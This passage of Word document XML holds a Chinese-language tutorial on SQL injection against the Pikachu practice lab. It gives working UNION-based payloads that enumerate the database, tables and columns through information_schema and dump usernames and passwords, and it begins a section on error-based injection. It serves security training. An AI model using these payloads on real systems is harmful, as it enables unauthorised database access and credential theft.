                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59709C9C" w14:textId="77777777" w:rsidR="00B81EFF" w:rsidRDefault="00B81EFF" w:rsidP="006029FC">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通过这个简单的办法找到主查询一共有三个字段。之后我们来使用union来做一个SQL语句的拼接。输入构造好的语句</w:t>
      </w:r>
      <w:r w:rsidR="00F35122">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>' union select database(),user(),version()#%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,反馈如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5034E1D4" w14:textId="77777777" w:rsidR="00F35122" w:rsidRDefault="00F35122" w:rsidP="006029FC">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140B9914" wp14:editId="1BFC520C">
            <wp:extent cx="5278120" cy="1709171"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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8120" cy="1709171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C85963" w14:textId="77777777" w:rsidR="00C96995" w:rsidRPr="009E7F7C" w:rsidRDefault="00C96995" w:rsidP="00C96995">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00391306">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C19D67F" w14:textId="77777777" w:rsidR="00C96995" w:rsidRDefault="00C96995" w:rsidP="00C96995">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>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ab/>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>information_schema数据库是MySQL系统自带的数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。通过information_schema注入，我们可以将整个数据库内容全部窃取出来,</w:t>
      </w:r>
      <w:r w:rsidR="00D268DF" w:rsidRPr="00D268DF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用order by来判断查询的字段。先找出数据库的名称，输入</w:t>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>vince' union select database(),user(),</w:t>
      </w:r>
      <w:r w:rsidR="00AE74CE">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>#%</w:t>
      </w:r>
      <w:r w:rsidR="00D268DF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>得到反馈，判断数据库名称为pikachu。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646B46F" w14:textId="77777777" w:rsidR="00D268DF" w:rsidRDefault="00D268DF" w:rsidP="00C96995">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>获取pikachu数据库的</w:t>
      </w:r>
      <w:r w:rsidRPr="0071525B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，输入:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="000236C4">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select table_schema ,table_name,</w:t>
      </w:r>
      <w:r w:rsidR="00AE74CE">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_schema.tables where table_schema='pikachu'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184C82F" w14:textId="77777777" w:rsidR="00D268DF" w:rsidRDefault="00AE74CE" w:rsidP="00C96995">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39E453EA" wp14:editId="07740706">
            <wp:extent cx="5278120" cy="3836116"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="3836116"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E00A650" w14:textId="77777777" w:rsidR="00F35122" w:rsidRPr="00C96995" w:rsidRDefault="00AE74CE" w:rsidP="00B953D9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取pikachu数据库的</w:t>
      </w:r>
      <w:r w:rsidRPr="0071525B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，输入：</w:t>
      </w:r>
      <w:r w:rsidR="00B953D9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B953D9" w:rsidRPr="00B953D9">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>k' union select table_name,column_name,3 from information_schema.columns where table_name='users'#%</w:t>
      </w:r>
      <w:r w:rsidR="0071525B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093E263C" wp14:editId="304D6FFD">
            <wp:extent cx="5278120" cy="4795138"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="4795138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F932D7" w14:textId="77777777" w:rsidR="00F35122" w:rsidRDefault="000B45F0" w:rsidP="006029FC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最后获取</w:t>
      </w:r>
      <w:r w:rsidRPr="000B45F0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的内容，输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>kobe'union select username ,password,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> from users#%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28202B89" w14:textId="77777777" w:rsidR="000B45F0" w:rsidRDefault="000B45F0" w:rsidP="006029FC">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25CE0C7C" wp14:editId="6CC1C723">
            <wp:extent cx="5273057" cy="3056238"/>
            <wp:effectExtent l="19050" t="0" r="3793" b="0"/>
            <wp:docPr id="1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273057" cy="3056238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="753300E8" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRPr="009E7F7C" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00391306">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006E41C7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>基于函数报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B6B1D4" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">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sidRPr="006E41C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一、技巧思路:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息，常见的select/insert/update/delete注入都可以使用报错方式来获取信息.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0DB12" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">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noProof/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61017E9A" wp14:editId="1162C193">
            <wp:extent cx="4217670" cy="2257425"/>
            <wp:effectExtent l="19050" t="0" r="0" b="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4217670" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56711F33" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC6C350" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRPr="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E41C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二、背景条件:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FC176" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRPr="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">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6E41C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED86D6" w14:textId="77777777" w:rsidR="006E41C7" w:rsidRPr="006E41C7" w:rsidRDefault="006E41C7" w:rsidP="006E41C7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E41C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>三、基于报错的信息获取</w:t>
      </w:r>
      <w:r w:rsidR="00DD64F7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="006E41C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>三个常用的用来报错的函数</w:t>
      </w:r>
      <w:r w:rsidR="00DD64F7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
